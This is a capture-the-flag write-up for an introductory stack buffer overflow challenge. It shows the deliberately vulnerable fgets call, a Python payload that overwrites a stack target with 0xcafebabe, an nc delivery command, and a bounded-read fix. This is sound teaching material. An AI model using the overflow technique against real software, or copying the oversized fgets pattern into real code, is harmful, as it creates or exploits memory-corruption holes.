2023 Cyber Apocalypse: Getting Started

Challenge Information

Attribute | Details
Event | 2023 Cyber Apocalypse
Category | Pwn
Challenge | Getting Started

Summary

This is an introductory buffer overflow challenge where a C program reads user input into a buffer that is too small, allowing stack corruption. The goal is to overwrite the target value (0xcafebabe) by crafting a precise payload that reaches it on the stack.


Analysis

The vulnerable C code:

void vuln(){
    char buffer[0x20] = {0}; // 32-byte buffer
    fprintf(stdout, "\nEnter payload here: ");
    fgets(buffer, 0x100, stdin); // size argument is 0x100 (256), far larger than the buffer
}

Vulnerability: fgets is passed a size of 0x100 (256), so it will store up to 255 input bytes plus a terminating NUL in a 0x20 (32) byte buffer, causing a buffer overflow.

The program displays the stack layout:

0x00007ffe2273d100 | 0x4141414141414141 <- Start of buffer
0x00007ffe2273d120 | 0x4242424242424242 <- Dummy value for alignment
0x00007ffe2273d128 | 0x8ac3bec3bac2bec2 <- Target to change

Solution

The exploitation strategy:

  1. Identify offset to target: The target is at offset 0x28 from buffer start (40 bytes)
  2. Craft payload:
    • 32 ‘A’s to fill the buffer
    • 8 ‘B’s for alignment/dummy value
    • Target value 0xcafebabe in little-endian format

Payload generation:

payload = 32 * 'A' + 8 * 'B' + '\xbe\xba\xfe\xca'
with open('payload.txt', 'wb') as f:
    # latin-1 maps each character to exactly one byte, so \xbe stays 0xbe
    f.write(payload.encode('latin-1'))

Delivery method:

cat payload.txt | nc TARGET_IP TARGET_PORT

Expected output: The program displays memory contents and prints the flag when the target value is successfully overwritten.


Key Takeaways

  • Buffer overflow vulnerabilities occur when input size is not properly validated
  • Stack-based overflows allow overwriting local variables and return addresses
  • Precise offset calculation is critical for successful exploitation
  • Understanding stack layout is essential for crafting working exploits
  • Little-endian byte order must be considered when writing multi-byte values
  • fgets(buffer, size, stdin) is dangerous if size exceeds buffer capacity
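
The fix implied by the last takeaway, as an added example (not code from the challenge or from the original write-up): pass the destination's real size to fgets and report an over-long line instead of storing it. The struct frame layout, the SENTINEL value and the function names are assumptions modelled on the stack dump above; the input is the write-up's 44-byte payload, rebuilt inline.

```c
#include <stdio.h>
#include <string.h>
#define SENTINEL 0x1122334455667788ULL /* constructed value, not from the challenge */

/* Assumed model of the dumped frame: 32-byte buffer, 8-byte dummy, 8-byte target. */
struct frame {
    char buffer[0x20];
    unsigned long long dummy, target;
};

/* Bounded read: fgets is given the destination's real size.
   Returns 0 if the line fit, 1 if it was truncated, -1 on EOF or error. */
int read_line_bounded(char *dst, size_t dst_size, FILE *in) {
    if (fgets(dst, (int)dst_size, in) == NULL) return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 0;
    }
    /* No newline stored: drain the rest of the line so a later read does not see it. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Feed the write-up's 44-byte payload (rebuilt here) through the bounded read. */
int run_page_payload(struct frame *f) {
    unsigned char payload[44];
    memset(payload, 'A', 32);
    memset(payload + 32, 'B', 8);
    memcpy(payload + 40, "\xbe\xba\xfe\xca", 4);
    *f = (struct frame){ {0}, 0x4242424242424242ULL, SENTINEL };
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    int rc = -1;
    if (fwrite(payload, 1, sizeof payload, in) == sizeof payload) {
        rewind(in);
        rc = read_line_bounded(f->buffer, sizeof f->buffer, in);
    }
    fclose(in);
    return rc;
}

int main(void) {
    struct frame f;
    int rc = run_page_payload(&f);
    printf("rc=%d target=0x%llx\n", rc, f.target);
    return 0;
}
```

With the size tied to sizeof, only 31 bytes and the terminating NUL are stored, the dummy and target fields keep their values, and the caller learns the line was too long.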